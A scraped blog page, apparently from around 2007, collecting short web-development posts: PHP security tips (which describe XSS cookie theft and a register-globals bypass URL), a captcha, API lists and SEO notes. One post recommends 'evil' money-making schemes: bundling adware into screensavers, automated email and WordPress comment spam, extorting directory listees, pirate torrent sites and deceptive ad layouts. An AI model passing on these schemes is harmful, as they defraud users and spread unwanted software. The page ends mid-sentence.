(No Ratings Yet)
Loading ...Rob Miller wrote a really great article on PHP Security. He makes a lot of good points, and suggestions, with real world examples and scenarios. Definitely worth reading. The article covers: XSS, SQL Injection, CSRF, among an array of other possible vulnerable avenues in PHP programming. Check it out if you ever do any kind of PHP programming, and want to keep it safe.
Link: PHP Security Guide
(No Ratings Yet) Loading ...Google, Youtube, Amazon, del.icio.us, all the big names release APIs for development and interaction with their services. It can be daunting trying to break into the external API scripting arena of programming. Here is a very long list of 302 USeful APIs. Upon clicking on any of them, you will be taken to a page that lists all of the information about that individual API, along with a download link. Definitely worth checking out!
List:
(No Ratings Yet) Loading ...Just thought I'd end the night with a simple script. This PHP script will list all file, directory, and sub directories, and will even make links out of them.
(No Ratings Yet) Loading ...If you're just starting to get into PHP you may be a bit confused about how the GD Library works, and how to implement that into things such a CAPTCHA. This is a very easy implementation of a captcha. This will help stop spammers, and spam bots from abusing your form, or spamming your server.
I won't however, prevent the abuse as noted in Jeff Atwoods post, it will however help.
So, let's say you have a public submission or contact form on your website, that looks somewhat like the following:
We'll use a captcha to keep this form somewhat safe ().
Obviously you need a PHP engine enabled for your Web server to execute PHP scripts, and GD (PHP graphics library) to generate the image. The solution below is tested for Apache (Windows and Unix), IIS (Windows), PHP-4, PHP-5, GD and GD2.
There you go! A quick, and dirty captcha for easy implementation. Of course there are much more secure and stronger methods to achieve this feature, but this is just the quick and dirty.
Hope this helped.
(No Ratings Yet) Loading ...David Hurth over at Ajaxonomy have created a pretty cool little web application. Here are the specifics:
If you have been using the popular service Digg you know that it is very easy to submit a story and to see it start to gain traction just to be buried into the dark abyss. What I find particularly frustrating is that you don't know how many people buried the story and the reason for the bury. If you have seen Digg Spy you have noticed that the application does show buries, but you can't just track data for a particular story.
After much frustration Ajaxonomy is now releasing a Bury Recorder application. How the application works is you take the story's URL (This is the URL of the page that the "more" link on the Digg upcoming/popular pages takes you or the page that clicking on the story title takes from your profile i.e. http://digg.com/[story]) and put it into the application and once you click "Watch for Buries" the application will start recording any buries that the story receives. This will allow you to see if your story had 100 diggs and 5 buries before it was permanently buried, or if it was more like 100 diggs and 300 buries. The idea is that you would submit a story and then have the recorder capture any buries from the time that you start the application watching for buries. You'll want to note that in this Beta 1.0 release, so currently you have to leave your machine on and the application open in order to make sure that it continues to capture buries.
Definitely worth checking out, a small program full of ingenuity.I'm fast becoming a regular reader over at Ajaxonomy. I suggest any JS/AJAX programmers do the same.
Link: Get Insight Into Digg's Bury System With Ajaxonomy's Bury Recorder.
(No Ratings Yet) Loading ...If you are defied by AJAX and want to have better experience, then you
may want to try AJAX Webshop because it features IDE and visualization
and allows beginners to develop Rich Web applications quickly. Let's
look at some of its features:
Based on standard component library it allows Ajax IDE in the pattern
of rapid application development (RAD)
Integrated development and management tools are available. Easy-to-use
visual Unified Modeling Language and visual IDE; complete component
and object-oriented development pattern
Rich Web component library
Troubleshooting IntelliSense support, code editing support, project
release and deployment support.
Java, PHP, C#, VB support
Compatible with IE, Firefox
Download: AJAX Workshop
(No Ratings Yet) Loading ...If there's anything I particularly hate when it comes to SEO, it's the meta keywords tag. I so wish it had never been invented. It's practically useless, yet people still obsess over it. In this article, I'll explain more about why you shouldn't worry about it except perhaps for misspellings, as well as which search engines support it.
The meta keywords tag is one of several of meta tags that you can insert into your web pages to provide search engines with information about your pages that isn't visible on the page itself. For example, my Meta Robots Tag 101: Blocking Spiders, Cached Pages & More article covers how you can use a different meta tag -- the meta robots tag -- to block pages from being indexed. Users don't see this information (unless they look at your source code), but search engines do.
I recently read an interesting article I think may help some people with SEO concerns out there for their major sites and / or blogs. The above is a quote from the article. Link is below:
Link: Meta Keywords Tag 101: How To "Legally" Hide Words On Your Pages For Search Engines.
(No Ratings Yet) Loading ...PHP MySQL Web Development Security Tips - 14 tips you should know when developing with PHP and MySQL
I read about many of these points in books and tutorials but I was rather lazy to think about many of them initially learned some of these lessons the hard way. Fortunately I didn't lose any major data over security issues with PHP MySQL, but my suggestion to everyone who is new to PHP is to read these tips and apply them *before* you end up with a big mess.
1.
If you are expecting an integer call intval() (or use cast) or if you don't expect a username to have a dash (-) in it, check it with strstr() and prompt the user that this username is not valid.
Here is an example:
Now $post_id will be an integer for sure 
If you are validating user input with JavaScript, be sure to do it on the server side too, because for bypassing your JavaScript validation a user just needs to turn their JavaScript off.
JavaScript validation is only good to reduce the server load.
Use mysql_real_escape_string() to escape the user input.
PHP.net recommends this function: (well a little different)
Then you can use it like this:
For example $id is suppose to be an integer:
Note that, using intval() would fix the problem here.
This will prevent XSS (Cross Site Scripting) attacks, imagine you receive and save some data from a user and you want to display this data on a web page later (maybe his/her bio or username) and the user puts this bit of code in the input field along with his bio:
If you display the raw user input on a web page this will be very ugly, it can even be worse if a user inputs this code instead:
With this, an attacker can steal cookies from whoever visits that certain page (containing bio etc.) and this includes session cookies with session IDs in them so the attacker can hijack your users' sessions and appear to be logged in as other users.
When displaying user input on a page use htmlentities($user_bio, ENT_QUOTES, 'UTF-8');
If you are expecting images, make sure the file you are receiving is an image or it might be a PHP script that can run on your server and does whatever damage you can imagine.
One quick way is to check the file extension:
Note that validating extension is a very simple way, and not the best way, to validate file uploads but it's effective;
simply because unless you have set your server to interpret .jpg files as PHP scripts then you are fine.
If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version.
If a database user is never going to drop tables, then when creating that user don't give it drop table permissions, normally just SELECT, UPDATE, DELETE, INSERT should be enough.
If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server.
.inc files will be written to the browser just like text files (unless your server is setup to interpret them as PHP scripts), users will be able to see your messy code (kidding) and possibly find exploits or see your passwords etc.
Have extensions like config.inc.php or have a .htaccess file in your extension (templates, libs etc.) folders with this one line:
Register globals can be very dangerous, consider this bit of code:
Now with register globals on an attacker can view this page like this and bypass your authentication:
http://yourwebsite.com/admin.php?auth=1
If you have registered globals on and you can't turn it off for some reason you can fix these issues by defining your variables first:
Defining your variables first is a good programming practice that I suggest you follow anyway.
Just take a look at www.php.net and see release announcements and note how many security issues they fix on every release to understand why this is important.
Always find new books about PHP security to read; you can start by reading the 4th book in the Learning PHP Thread, which is one of the best books on PHP security and the author is a member of the PHP team so he knows the internals very well.
Feel free to reply to this post and add to this list, it will be helpful for everyone!
If you find this useful, please Digg and / or comment please!
(+15 rating, 3 votes) Loading ...This is a collection of free RSS icons from around the internet. This may help those of you who have been looking for some of those "2.0" RSS icons. They're all free of charge.
A good upcoming recourse as well: http://www.freeiconsdownload
(No Ratings Yet) Loading ...Everyone loves money, but making it online isn’t all that easy if you have morals. If you don’t, this article will give you some great tips to make quick money online. Before I start I need to state that I don’t condone any of these methods, and they are used at your own risk. I don’t take responsibility for any damage you may do.
Set up a web site that serves as a Proxy, so people can browse blocked sites at work, and kids can browse blocked sites at school. Kids want nothing more than to have access to all their favorite game and social networking sites, and many of them know about proxies. A common script is: CGI Proxy, it is great because it allows people to use sites that require a log in. Here is an auto installer for it. CGI Proxy Auto installer. You will need to have an ad, probably and Adsense block in the header, so ads are shown when people browse. The main drawback of this method is that if your proxy site does become popular it will probably be blocked by school Internet servers. So if you wanted to try this method out, I wouldn’t shell out any money on a domain name, or expensive hosting.
Create a screen saver that bundles adware (Zangocash), so whenever someone installs the Screensaver, you make affiliate money. You need to upload your Screensaver to as many Screensaver sites as possible. For a full write up on the details of this method, read: Blue Hat SEO’s How To Make a $100 per Day
Set up a blogger account using an anonymous email account, then use it to share p2p links to live sporting events. I have seen people earn great money fast using it. It works particularly well for sharing live Cricket using the software Sopcast. The Indian Sub Continent love p2p links for cricket matches, particularly when there are big games involving India, Bangladesh, Pakistan or Sri Lanka. You can use Sopcast to embed a p2p media player showing the channel with the cricket on it, then surround it with lots of Adsense ads. I have never seen Google remove any of these blogs, nor have I heard of any Adsense account being suspended for doing this. Someone tried to sell a successful attempt using this technique on Sitepoint, and he showed his earnings for the period of the cricket world cup of $1200 US. So timing is key here!
I love poker, and playing online, I cashed out $800 for about 4 months of on and off play, which is more money than I have made through anything else online. The key to making money with online poker when you are starting out is to take advantage of the various signup offers and bonuses. The idea is that poker rooms will give you a cash incentive bonus, where if you play a certain amount of hands they will give you free cash. In their minds you are a beginner so you will probably make them more money in the process, but if you learn to play tight, and only play very good starting hands, and fold the rest you can clear good money with only an small amount of skill. As playing tight requires a lot of patience, once you get the hang of it you can speed things up by playing 3-4 tables at once. Do some research for free poker bonus’s, and you will find plenty of sites and forums with advice to get you started in the evil world of online gambling.
Levi from Internet Marketing Sucks has a great plan to make money by setting up a MySpace resource site. He even provides a script and instructions that will help you on your way. It’s not particularly evil, and rather crafty, but it makes the list anyway.
Recent news about raids on the owner of oink’s house would suggest that this is a very risky business, especially if you live in a country that will police such activities. The torrent scene is massive, as such there is great money to be made by those that are crazy enough. The idea is to make it private, then set up a scheme where you have “donations” to pay for your server, and donators get extra upload credit. Also have lots of pay per click advertising and you will be away, making plenty of cash. But I would make sure your cash heap is large enough to fight a legal battle if you get caught.
Arbitrage is where you buy something for a certain value, with the intention of selling it on for a greater value. You can use search engine marketing to buy traffic from one network, Google Adwords, then send that traffic to a landing page that has advertising on it for another network, Yahoo. The idea is to create a landing page with very little actual content, and format it so that ads appear to be content. Then your unsuspecting visitor may click ads thinking it is content. You will need to test different networks and keywords, but you can make good money using this method. It is purely evil though as it fills the net with rubbish sites.
A scraper site is a web site that pulls content from other sources, for example you could have a site that pulls the top 10 stories from the rss feeds of digg, reddit, delicious. It’s probably a good idea to use keywords to narrow down your results to a certain topic. Then plant lots of advertising around the content, especially Adsense. As you don’t have any real content you are never likely to get many inbound links, so to rank, you will need to build up a network of sites, then link them to each other to help your sites rank in search engines. You could combine this method with 7 to create some seriously evil sites.
Then takes bribes to list certain sites. Or email people who are on the list and tell them that if they don’t pay you, you will boot them off the directory. People do this, believe me. Read about the DMOZ Shoemoney Extortion.
Everybody hates spam, but some people obviously open it from time to time. Get creative with your subject lines, and spam away. It is illegal in some countries so be careful. Basically the idea is to find some pay per click advertising scheme that allows you to advertise via email, or include a link from the email that has advertising on it. You will want to find some tools to automate this process, but I’m not telling you where to find them. Another form of Spam that seems to be very popular is Wordpress spam. All you need to do is set up a landing page on a dodgy domain that sells dodgy pharmaceutical products or any form of ppc or ppa advertising and spam away, automating comment posting on blogs that link to your landing page. It’s surprising how many sites don’t block spam properly.
Starting your own porn site is not hard, if you're using unique, authentic content ;). Start one, a niche or category generally helps. Generate content quickly, and post often. Good site design, fair price, and you'll bring in cash quickly. Practically from doing nothing but burning calories at that!
I know most of this stuff is pure evil, but people actually make good money using these techniques.
(No Ratings Yet) Loading ...So Apple have announce the Ma
